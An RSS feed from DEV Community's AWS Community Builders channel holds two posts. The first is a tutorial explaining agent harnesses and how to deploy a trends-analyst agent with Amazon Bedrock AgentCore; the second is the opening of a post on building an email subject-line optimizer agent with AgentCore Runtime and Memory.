<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: AWS Community Builders </title>
    <description>The latest articles on DEV Community by AWS Community Builders  (@aws-builders).</description>
    <link>https://dev.to/aws-builders</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Forganization%2Fprofile_image%2F2794%2F88da75b6-aadd-4ea1-8083-ae2dfca8be94.png</url>
      <title>DEV Community: AWS Community Builders </title>
      <link>https://dev.to/aws-builders</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/aws-builders"/>
    <language>en</language>
    <item>
      <title>What Is an Agent Harness? And Why Every AI Agent Needs One</title>
      <dc:creator>SURYANSH GUPTA</dc:creator>
      <pubDate>Sat, 09 May 2026 07:28:09 +0000</pubDate>
      <link>https://dev.to/aws-builders/what-is-an-agent-harness-and-why-every-ai-agent-needs-one-382l</link>
      <guid>https://dev.to/aws-builders/what-is-an-agent-harness-and-why-every-ai-agent-needs-one-382l</guid>
      <description>&lt;p&gt;If you've spent any time building with AI lately, you've probably heard the word "agent" thrown around a lot. But here's something that doesn't get talked about nearly as much: &lt;strong&gt;before you can have a real AI agent, you need a harness.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I know that term might sound unfamiliar or even a little abstract. When I first came across it, I had the same reaction. But once it clicked, I couldn't unsee it — and I genuinely think it's one of the most important concepts to understand if you want to go beyond just calling an LLM API and actually building something that &lt;em&gt;does things&lt;/em&gt; autonomously.&lt;/p&gt;

&lt;p&gt;Let's break it all down from scratch.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Problem With "Just Using a Model"
&lt;/h2&gt;

&lt;p&gt;Picture this: you've got API access to a powerful model like Claude or GPT-4. You send it a prompt, it sends back a response. That's great for chatbots and one-shot completions — but what if you want the model to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Browse the web and pull real-time data?&lt;/li&gt;
&lt;li&gt;Execute Python code to analyze that data?&lt;/li&gt;
&lt;li&gt;Remember what you told it last week?&lt;/li&gt;
&lt;li&gt;Coordinate across multiple steps — each one depending on the last?&lt;/li&gt;
&lt;li&gt;Call your internal APIs or tools?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A raw model, on its own, can't do any of that. It can &lt;em&gt;talk&lt;/em&gt; about doing those things, but it has no way to actually &lt;em&gt;carry them out&lt;/em&gt;. It's like hiring a brilliant analyst who has no laptop, no internet, and can only communicate by passing notes. The intelligence is there — the infrastructure is not.&lt;/p&gt;

&lt;p&gt;That missing infrastructure is the harness.&lt;/p&gt;




&lt;h2&gt;
  
  
  So, What Exactly Is an Agent Harness?
&lt;/h2&gt;

&lt;p&gt;An agent harness is everything you build &lt;em&gt;around&lt;/em&gt; a model to transform it from a text-generator into an agent that can act in the real world.&lt;/p&gt;

&lt;p&gt;The cleanest formula I've come across is:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Agent = Model + Harness&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Anything in your agent that isn't the model itself is part of the harness.&lt;/p&gt;

&lt;p&gt;In concrete terms, the harness typically includes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;The orchestration loop&lt;/strong&gt; — the logic that takes a user message, asks the model what to do, runs that action, feeds the result back, and repeats until the task is complete.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tool connections&lt;/strong&gt; — the plumbing that lets the model call a browser, run code, query a database, or hit an external API.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory&lt;/strong&gt; — short-term context within a session AND long-term memory that persists across sessions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Context management&lt;/strong&gt; — deciding what information goes into the prompt at each step (you can't just keep appending forever — models have token limits).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compute and sandboxing&lt;/strong&gt; — somewhere safe for the agent to run code without blowing up your system.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Authentication&lt;/strong&gt; — so your agent can securely call external APIs without leaking credentials.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Observability&lt;/strong&gt; — logs, traces, and debugging tools so you know what happened when things go sideways at 2 AM.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Session management&lt;/strong&gt; — the ability for users to pause and resume, pick up right where they left off.&lt;/li&gt;
&lt;/ul&gt;
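&lt;p&gt;The orchestration loop at the top of that list is the heart of any harness, and it can be sketched in a few lines of plain Python. Treat this as a minimal illustration, not a real SDK: &lt;code&gt;call_model&lt;/code&gt; and the &lt;code&gt;tools&lt;/code&gt; registry are hypothetical stand-ins.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;# Minimal agent loop sketch. The model proposes an action as structured
# output; the harness executes it and feeds the observation back.
def call_model(messages):
    # Hypothetical stand-in: a real harness would call an LLM API here and
    # parse the reply into {"type": "tool_call", ...} or {"type": "final", ...}.
    raise NotImplementedError

def run_agent(user_message, tools, model=call_model, max_steps=10):
    messages = [{"role": "user", "content": user_message}]
    for _ in range(max_steps):
        action = model(messages)
        if action["type"] == "final":
            return action["text"]  # the model says the task is done
        result = tools[action["tool"]](**action["args"])  # run the tool
        # Feed the observation back so the model can plan its next step.
        messages.append({"role": "tool", "content": str(result)})
    return "stopped: step budget exhausted"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Everything else in the list (memory, sandboxing, auth, observability) hangs off this loop: each piece either shapes what goes into &lt;code&gt;messages&lt;/code&gt; or controls how a tool call actually gets executed.&lt;/p&gt;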

&lt;p&gt;Look at any AI-powered product you use today — Claude Code, GitHub Copilot, Cursor, Perplexity — and behind the scenes, there's a harness doing all of this work. The model is just one piece of a much larger machine.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why Harness Building Has Been So Painful
&lt;/h2&gt;

&lt;p&gt;Here's the honest reality: building a harness from scratch is &lt;em&gt;hard&lt;/em&gt; and &lt;em&gt;time-consuming&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;If you've done it before, you know the drill. You pick a framework — LangGraph, LlamaIndex, CrewAI, Strands Agents — and start writing code. You wire up your tools. You manage your prompt structure carefully so the model doesn't get confused. You add error handling for when tool calls fail. You build retry logic. You handle streaming output. You set up logging. You package everything into a container, provision some compute, and deploy it.&lt;/p&gt;

&lt;p&gt;And then you realize you need session persistence. So you add a database. And then you realize you need the agent to authenticate with an external API. So you set up credential management. And now you need to understand why the agent went down a weird reasoning path, so you add tracing.&lt;/p&gt;

&lt;p&gt;For a straightforward use case, this might take a few days. For a complex one, it could take weeks — and a whole team.&lt;/p&gt;

&lt;p&gt;This is the real barrier to building with AI agents. Not the model. The harness.&lt;/p&gt;




&lt;h2&gt;
  
  
  Enter Managed Harnesses: The Agent Factory Model
&lt;/h2&gt;

&lt;p&gt;Tooling has finally started catching up to this problem. The idea behind a managed harness is simple: instead of writing all that orchestration and infrastructure code yourself, you declare what your agent needs as &lt;em&gt;configuration&lt;/em&gt;, and the service builds the harness for you.&lt;/p&gt;

&lt;p&gt;Think of it like the difference between setting up your own server (writing harness code from scratch) versus using a managed cloud service (declaring config and letting the platform handle the rest).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Amazon Bedrock AgentCore&lt;/strong&gt; is one of the services taking this approach. With AgentCore's harness feature, you define your agent in a JSON config file — model, system prompt, tools, memory settings — and the platform compiles that into a fully running agent, handling all the infrastructure underneath.&lt;/p&gt;

&lt;p&gt;Under the hood, AgentCore harness uses &lt;strong&gt;Strands Agents&lt;/strong&gt; (AWS's open-source agent SDK) to assemble the orchestration loop, tool execution, memory management, context handling, and streaming. Then it runs the whole thing inside an isolated &lt;strong&gt;microVM&lt;/strong&gt; — its own dedicated CPU, memory, and filesystem — without you provisioning a single server.&lt;/p&gt;




&lt;h2&gt;
  
  
  Let's Build Something: An AI Trends Analyst in Minutes
&lt;/h2&gt;

&lt;p&gt;To make this concrete, here's how you'd go from zero to a working AI agent using AgentCore harness — and yes, this genuinely takes about 5 minutes.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Goal
&lt;/h3&gt;

&lt;p&gt;Build an agent that browses HackerNews and dev.to, pulls today's top AI and developer tools posts, clusters them by topic, and produces a ranked summary with a chart — all autonomously.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Install the CLI
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;npm &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-g&lt;/span&gt; @aws/agentcore@preview
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 2: Create Your Agent Config Interactively
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore create
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command walks you through a set of prompts — which model to use, which tools to enable, authentication type, and so on. At the end, it generates a config file like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"TrendsAgentHarness"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"model"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"provider"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"bedrock"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"modelId"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"global.anthropic.claude-sonnet-4-6"&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"tools"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"agentcore_browser"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"browser"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"agentcore_code_interpreter"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"code-interpreter"&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"skills"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[],&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"authorizerType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"AWS_IAM"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. The browser tool lets the agent navigate real websites. The code interpreter gives it a Python sandbox to crunch data and generate charts.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Write Your System Prompt
&lt;/h3&gt;

&lt;p&gt;Edit the &lt;code&gt;system-prompt.md&lt;/code&gt; file that was created alongside the config:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight markdown"&gt;&lt;code&gt;Your job is to keep a pulse on what the AI and dev community is buzzing 
about right now. Every session, head over to HackerNews and dev.to, 
scrape today's hottest posts, then use the code interpreter to make sense 
of it all — cluster the topics, rank them by how often they show up, and 
summarize the top 5 in plain language. Throw in a bar chart. No fluff.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The system prompt is your agent's personality and operating instructions. This is where you define what it does, how it thinks, and what output you expect from it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Deploy It
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore deploy
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Behind the scenes, this takes your config and system prompt, assembles a Strands Agents program, and deploys it into a managed microVM environment. No Dockerfile, no Kubernetes, no EC2 instance. Just one command.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 5: Invoke It
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;agentcore invoke &lt;span class="nt"&gt;--harness&lt;/span&gt; TrendsAgentHarness &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--session-id&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;uuidgen&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="s2"&gt;"What's trending in IT today?"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;What happens when you run this:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The agent opens a browser and navigates to HackerNews.&lt;/li&gt;
&lt;li&gt;It scrolls through and reads the top posts.&lt;/li&gt;
&lt;li&gt;It does the same on dev.to.&lt;/li&gt;
&lt;li&gt;It pulls all the results into the code interpreter.&lt;/li&gt;
&lt;li&gt;It runs Python to cluster topics, calculate frequency, and build a bar chart.&lt;/li&gt;
&lt;li&gt;It streams a formatted summary back to your terminal.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;All of this runs in an isolated microVM that spins up for this session and tears down when it's done. No cross-session data leakage, no noisy neighbors.&lt;/p&gt;




&lt;h2&gt;
  
  
  What Comes Built In
&lt;/h2&gt;

&lt;p&gt;Here's a breakdown of what AgentCore harness gives you without any extra setup:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;What It Actually Means For You&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Isolated microVM per session&lt;/td&gt;
&lt;td&gt;Your agent gets its own CPU, memory, and filesystem. Sessions are completely isolated from each other.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Shell access&lt;/td&gt;
&lt;td&gt;The agent can run shell commands directly without going through the model's reasoning loop — faster and cheaper.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistent filesystem&lt;/td&gt;
&lt;td&gt;Mid-session, the agent can save files, pause, and resume exactly where it left off.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Model-agnostic routing&lt;/td&gt;
&lt;td&gt;Switch between Bedrock, OpenAI, and Google Gemini. You can even change providers mid-session and the conversation context stays intact.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Built-in browser tool&lt;/td&gt;
&lt;td&gt;Powered by AgentCore Browser — the agent can navigate real websites, not just search APIs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Built-in code interpreter&lt;/td&gt;
&lt;td&gt;A full Python sandbox. The agent can write and execute code, generate charts, process files, and more.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MCP server support&lt;/td&gt;
&lt;td&gt;Connect to any MCP-compatible tool server — Slack, Notion, GitHub, whatever your workflow needs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AgentCore Gateway&lt;/td&gt;
&lt;td&gt;Connect to APIs you've registered centrally, so credentials are managed outside the agent.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Custom tool definitions&lt;/td&gt;
&lt;td&gt;Define your own inline function tools for the agent to call.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Skills&lt;/td&gt;
&lt;td&gt;Package domain knowledge as markdown + scripts and give your agent expert-level context on demand.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Full observability&lt;/td&gt;
&lt;td&gt;Every action is auto-traced via AgentCore Observability, so you can debug and audit everything that happened.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Agent Skills: Teaching Your Agent Domain Expertise
&lt;/h2&gt;

&lt;p&gt;One feature worth calling out specifically is &lt;strong&gt;skills&lt;/strong&gt;. An agent skill is a bundle of markdown instructions and (optionally) scripts that gives your agent deep knowledge about a specific domain or workflow.&lt;/p&gt;

&lt;p&gt;Think of it this way: you can equip a general model with your specific context, without any training. For example:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A skill that teaches the agent how to work with your internal data format.&lt;/li&gt;
&lt;li&gt;A skill that walks the agent through your company's API conventions.&lt;/li&gt;
&lt;li&gt;A skill that gives the agent step-by-step knowledge of how to process Excel reports your way.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You package the skill into the agent's environment, point the harness at it, and the agent picks it up and uses it automatically when relevant. No fine-tuning. No custom model training. Just structured knowledge the agent can reference.&lt;/p&gt;
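&lt;p&gt;The docs, not this post, are the source of truth for the exact bundle format, but as a purely illustrative sketch, a skill for the Excel-reports example might be laid out like this (names and layout are hypothetical):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;excel-reports-skill/
  SKILL.md         # when to use the skill, step-by-step processing rules
  conventions.md   # column names, sheet layout, edge cases to watch for
  scripts/
    clean_report.py  # helper the agent can run in its code sandbox
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;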




&lt;h2&gt;
  
  
  The Escape Hatch: When You Outgrow Config
&lt;/h2&gt;

&lt;p&gt;One question you might be asking: "What happens when my use case gets complex enough that a config file isn't enough?"&lt;/p&gt;

&lt;p&gt;That's a fair and important question. Maybe you need:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Custom multi-agent orchestration where agents hand off tasks to each other.&lt;/li&gt;
&lt;li&gt;Specialized routing logic based on the content of a message.&lt;/li&gt;
&lt;li&gt;A fully custom memory layer with your own vector database.&lt;/li&gt;
&lt;li&gt;Integration with internal infrastructure that doesn't fit a standard pattern.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;AgentCore harness has an answer for this: &lt;strong&gt;export to code&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;When you need full control, you can export your harness configuration to Strands Agents code. You get the equivalent Python program that AgentCore was running for you — fully readable, fully editable — and you can extend it however you need. You stay on the same platform, just with more control.&lt;/p&gt;

&lt;p&gt;This is a smart design. You start with the fast path (config), and you graduate to the custom path (code) only when you actually need it. You're not locked into one or the other.&lt;/p&gt;




&lt;h2&gt;
  
  
  Common Questions Answered
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Do I need to build a harness if I'm just using Claude.ai or ChatGPT?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No. Those are consumer products where someone else already built the harness for you. You need to build your own when you're creating &lt;em&gt;custom&lt;/em&gt; agents — ones that call your specific tools, connect to your internal systems, maintain state, or run autonomously over multiple steps.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is a harness the same as an agent framework?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Not quite. A framework (like Strands Agents, LangGraph, or CrewAI) gives you the building blocks — tool interfaces, loop patterns, model connectors. A harness is the fully assembled, running system: framework code plus compute, sandboxing, memory, auth, and observability. You use a framework to &lt;em&gt;build&lt;/em&gt; a harness, or you use a managed service to build one &lt;em&gt;for you&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can I build a harness without a framework?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Technically yes, but you'd be writing the entire orchestration loop, tool dispatch, error recovery, and context management from scratch. Frameworks exist precisely so you don't have to. It's a bit like writing raw socket code instead of using Express.js — possible, but almost never the right call.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is the browser tool expensive on tokens?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Yes, it does consume more tokens than simpler tools since it's processing full web pages. For the trends analyst use case, it's absolutely worth it. For agents that need lighter-weight data fetching, you might want to explore API-based tools or MCP servers that return structured data instead.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why This Matters for the Community
&lt;/h2&gt;

&lt;p&gt;For a long time, building a production-grade AI agent required deep expertise across model APIs, orchestration frameworks, cloud infrastructure, and security. That's a lot of disciplines to combine, and it's been a genuine barrier for developers who want to experiment and build.&lt;/p&gt;

&lt;p&gt;Managed harness services like AgentCore change that equation. The gap between "I have an idea for an agent" and "I have a running agent" is now measured in minutes for straightforward use cases. That's genuinely exciting.&lt;/p&gt;

&lt;p&gt;It also means the interesting work shifts. Instead of spending your energy on infrastructure plumbing, you can focus on:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;What should your agent actually &lt;em&gt;do&lt;/em&gt;?&lt;/li&gt;
&lt;li&gt;What domain knowledge does it need?&lt;/li&gt;
&lt;li&gt;What tools should it have access to?&lt;/li&gt;
&lt;li&gt;How should it reason and communicate?&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Those are the questions worth spending your time on.&lt;/p&gt;




&lt;h2&gt;
  
  
  Where to Go From Here
&lt;/h2&gt;

&lt;p&gt;AgentCore harness is currently in &lt;strong&gt;public preview&lt;/strong&gt; in four AWS regions: US West (Oregon), US East (N. Virginia), Europe (Frankfurt), and Asia Pacific (Sydney).&lt;/p&gt;

&lt;p&gt;Here are the resources to get started:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/bedrock/latest/userguide/agentcore.html" rel="noopener noreferrer"&gt;AgentCore harness documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://strandsagents.com" rel="noopener noreferrer"&gt;Strands Agents SDK (open source)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://aws.amazon.com/bedrock/pricing/" rel="noopener noreferrer"&gt;AgentCore pricing&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The trends analyst agent described in this post — browsing HackerNews, clustering AI topics, generating a chart — took about 5 minutes from idea to first working invocation. The JSON config is 15 lines. The system prompt is 5 lines.&lt;/p&gt;

&lt;p&gt;What would you build with 5 minutes and a config file? I'd love to see what the community comes up with. Drop your ideas or experiments in the comments.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;If this post helped you understand agent harnesses better, consider sharing it with someone who's been struggling to wrap their head around the agent architecture puzzle. And if you're already building harnesses the hard way, maybe it's time to let the factory do some of that work for you.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>mcp</category>
      <category>serverless</category>
    </item>
    <item>
      <title>Cracking the Bedrock, Reaching the Core: Building Agents with AWS AgentCore Runtime and Memory</title>
      <dc:creator>Ana Silva</dc:creator>
      <pubDate>Fri, 08 May 2026 23:49:40 +0000</pubDate>
      <link>https://dev.to/aws-builders/cracking-the-bedrock-reaching-the-core-building-agents-with-aws-agentcore-runtime-and-memory-32kg</link>
      <guid>https://dev.to/aws-builders/cracking-the-bedrock-reaching-the-core-building-agents-with-aws-agentcore-runtime-and-memory-32kg</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fu3zhmezad44ijjrqxg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1fu3zhmezad44ijjrqxg.png" alt="Moses Striking the Rock — Joachim Anthonisz Wtewael, 1624" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This article walks through a project I built on Amazon Bedrock AgentCore: an agent that turns campaign briefings into ranked email subject lines, and improves across sessions as it learns from the user.&lt;/p&gt;

&lt;p&gt;The goal here isn’t to cover every AgentCore primitive, but to show how a few of them (Runtime and Memory) fit together in a real loop, and to be honest about which ones I deliberately left out. The project itself is intentionally small. The interesting part is the architecture around it: where scoring runs, why the optimization loop stays framework-agnostic, what memory actually stores, and which tradeoffs come with each decision.&lt;/p&gt;

&lt;p&gt;👉 You can access the project on &lt;a href="https://github.com/anacds/subjectLineOptimizer/" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;


&lt;h2&gt;
  
  
  Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Agents-to-AgentCore Evolution&lt;/li&gt;
&lt;li&gt;The use case: briefing in, subject lines out&lt;/li&gt;
&lt;li&gt;Drafting a solution&lt;/li&gt;
&lt;li&gt;I. The entrypoint (main.py)&lt;/li&gt;
&lt;li&gt;II. The imperative shell (agent/builder.py)&lt;/li&gt;
&lt;li&gt;III. The functional core (agent/iteration.py)&lt;/li&gt;
&lt;li&gt;IV. Scoring&lt;/li&gt;
&lt;li&gt;V. The two agents and Bedrock&lt;/li&gt;
&lt;li&gt;VI. AgentCore Memory: four strategies&lt;/li&gt;
&lt;li&gt;VII. Observability&lt;/li&gt;
&lt;li&gt;VIII. What I didn't use this time&lt;/li&gt;
&lt;li&gt;IX. How to deploy and run it&lt;/li&gt;
&lt;li&gt;Closing thoughts&lt;/li&gt;
&lt;/ol&gt;


&lt;h2&gt;
  
  
  Agents-to-AgentCore Evolution
&lt;/h2&gt;

&lt;p&gt;Bedrock launched in 2023 as AWS's response to the rapid adoption of foundation models: a single API to call models from providers such as Anthropic, AI21 Labs, and Cohere, as well as Amazon's own Titan family, without managing inference infrastructure. Later that year AWS added Bedrock Agents, a configuration-driven product that bolted tool calling, knowledge bases, and memory onto a Bedrock model.&lt;/p&gt;

&lt;p&gt;It works for many cases, but it is a closed product: tool execution revolves around Lambda, retrieval has to go through Knowledge Bases, models have to be Bedrock-hosted, and you can't see or control how the agent decides what to do at each step. For more ambitious use cases, teams ended up bypassing Bedrock Agents and writing their own harness on EC2 or Lambda, which meant every team rebuilding the same plumbing: session management, sandboxing, identity, memory, and observability.&lt;/p&gt;

